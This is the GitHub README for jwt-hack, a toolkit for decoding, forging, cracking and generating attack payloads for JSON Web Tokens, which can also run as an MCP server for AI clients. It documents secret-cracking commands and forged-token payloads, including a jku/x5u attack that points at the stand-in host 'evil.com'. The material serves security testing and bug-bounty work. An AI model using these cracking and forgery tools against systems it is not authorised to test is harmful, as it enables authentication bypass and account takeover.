Skip to content

hahwul/jwt-hack

BranchesTags

Repository files navigation

JWT-HACK Logo

JSON Web Token Hack Toolkit

A high-performance toolkit for testing, analyzing and attacking JSON Web Tokens.

Installation

Cargo

cargo install jwt-hack

Homebrew

brew install jwt-hack

Snapcraft (Ubuntu)

sudo snap install jwt-hack

From source

git clone https://github.com/hahwul/jwt-hack
cd jwt-hack
cargo install --path .

Docker images

GHCR

docker pull ghcr.io/hahwul/jwt-hack:latest

Docker Hub

docker pull hahwul/jwt-hack:v2.2.0

Features

Mode Description Support
Encode JWT/JWE Encoder Secret based / Key based / Algorithm / Custom Header / DEFLATE Compression / JWE
Decode JWT/JWE Decoder Algorithm, Issued At Check, DEFLATE Compression, JWE Structure
Verify JWT Verifier Secret based / Key based (for asymmetric algorithms)
Crack Secret Cracker Dictionary Attack / Brute Force / DEFLATE Compression
Payload JWT Attack Payload Generator none / jku&x5u / alg_confusion / kid_sql / x5c / cty
MCP Model Context Protocol Server AI model integration via standardized protocol

Basic Usage

Decode a JWT

You can decode both regular and DEFLATE-compressed JWTs. The tool will automatically detect and decompress compressed tokens.

jwt-hack decode eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjM0In0.CHANGED
jwt-hack decode COMPRESSED_JWT_TOKEN

Decode a JWE

Decode JWE (JSON Web Encryption) tokens to analyze their structure. The tool automatically detects JWE format (5 parts) and displays the encryption details.

# Decode JWE token structure
jwt-hack decode eyJhbGciOiJkaXIiLCJlbmMiOiJBMjU2R0NNIn0..ZHVtbXlfaXZfMTIzNDU2.eyJ0ZXN0IjoiandlIn0.ZHVtbXlfdGFn

# Shows JWE header, encrypted key, IV, ciphertext, and authentication tag

Encode a JWT

jwt-hack encode '{"sub":"1234"}' --secret=your-secret

Encode a JWT with DEFLATE Compression

You can use the --compress option to apply DEFLATE compression to the JWT payload.

jwt-hack encode '{"sub":"1234"}' --secret=your-secret --compress

With Private Key

ssh-keygen -t rsa -b 4096 -E SHA256 -m PEM -P "" -f RS256.key jwt-hack encode '{"a":"z"}' --private-key RS256.key --algorithm=RS256


### Encode a JWE

Create JWE (JSON Web Encryption) tokens for testing encrypted JWT scenarios.

```bash
# Basic JWE encoding
jwt-hack encode '{"sub":"1234", "data":"encrypted"}' --jwe --secret=your-secret

# JWE tokens are encrypted and can only be decrypted with the proper key
jwt-hack encode '{"sensitive":"data"}' --jwe

Verify a JWT

Checks if a JWT's signature is valid using the provided secret or key.

# With Secret (HMAC algorithms like HS256, HS384, HS512)
jwt-hack verify YOUR_JWT_TOKEN_HERE --secret=your-256-bit-secret

# With Private Key (for asymmetric algorithms like RS256, ES256, EdDSA)
jwt-hack verify YOUR_JWT_TOKEN_HERE --private-key path/to/your/RS256_private.key

Crack a JWT

Dictionary and brute force attacks also support JWTs compressed with DEFLATE.

# Dictionary attack
jwt-hack crack -w wordlist.txt JWT_TOKEN
jwt-hack crack -w wordlist.txt COMPRESSED_JWT_TOKEN

# Bruteforce attack
jwt-hack crack -m brute JWT_TOKEN --max=4
jwt-hack crack -m brute COMPRESSED_JWT_TOKEN --max=4

Generate payloads

jwt-hack payload JWT_TOKEN --jwk-attack evil.com --jwk-trust trusted.com

MCP (Model Context Protocol) Server Mode

jwt-hack can run as an MCP server, allowing AI models to interact with JWT functionality through a standardized protocol.

# Start MCP server (communicates via stdio)
jwt-hack mcp

The MCP server exposes the following tools:

Tool Description Parameters
decode Decode JWT tokens token (string)
encode Encode JSON to JWT json (string), secret (optional), algorithm (default: HS256), no_signature (boolean)
verify Verify JWT signatures token (string), secret (optional), validate_exp (boolean)
crack Crack JWT tokens token (string), mode (dict/brute), chars (string), max (number)
payload Generate attack payloads token (string), target (string), jwk_attack (optional), jwk_protocol (default: https)

Example MCP Usage

The MCP server is designed to be used by AI models and MCP clients. Each tool accepts JSON parameters and returns structured responses.

Decode Tool:

{
  "name": "decode",
  "arguments": {
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
  }
}

Encode Tool:

{
  "name": "encode",
  "arguments": {
    "json": "{\"sub\":\"1234\",\"name\":\"test\"}",
    "secret": "mysecret",
    "algorithm": "HS256"
  }
}

MCP Client Integration Examples

You can connect jwt-hack’s MCP server to popular MCP-enabled clients. Make sure the jwt-hack binary is on your system and accessible by the client.

VSCode

{
  "servers": {
    "jwt-hack": {
      "type": "stdio",
      "command": "jwt-hack",
      "args": [
        "mcp"
      ]
    }
  },
  "inputs": []
}

Claude Desktop

{
  "mcpServers": {
    "jwt-hack": {
      "command": "jwt-hack",
      "args": ["mcp"],
      "env": {}
    }
  }
}

DEFLATE Compression Support

DEFLATE Compression Support The jwt-hack toolkit supports DEFLATE compression for JWTs.

  • Use the --compress option with encode to generate compressed JWTs.
  • The decode and crack modes automatically detect and handle compressed JWTs.

Contribute

Urx is open-source project and made it with ❤️ if you want contribute this project, please see CONTRIBUTING.md and Pull-Request with cool your contents.

About

JSON Web Token Hack Toolkit

Topics

security jwt tool hacking testing-tools bugbounty cracking hacktoberfest payload-generator

Resources

Readme

License

MIT license

Code of conduct

Code of conduct

Contributing

Contributing

Security policy

Security policy
Activity

Stars

884 stars

Watchers

17 watching

Forks

109 forks
Report repository

Releases 15

v2.2.0 Latest
Aug 29, 2025
+ 14 releases

Sponsor this project

 
Learn more about GitHub Sponsors

Packages

 
 
 

Contributors 12

Languages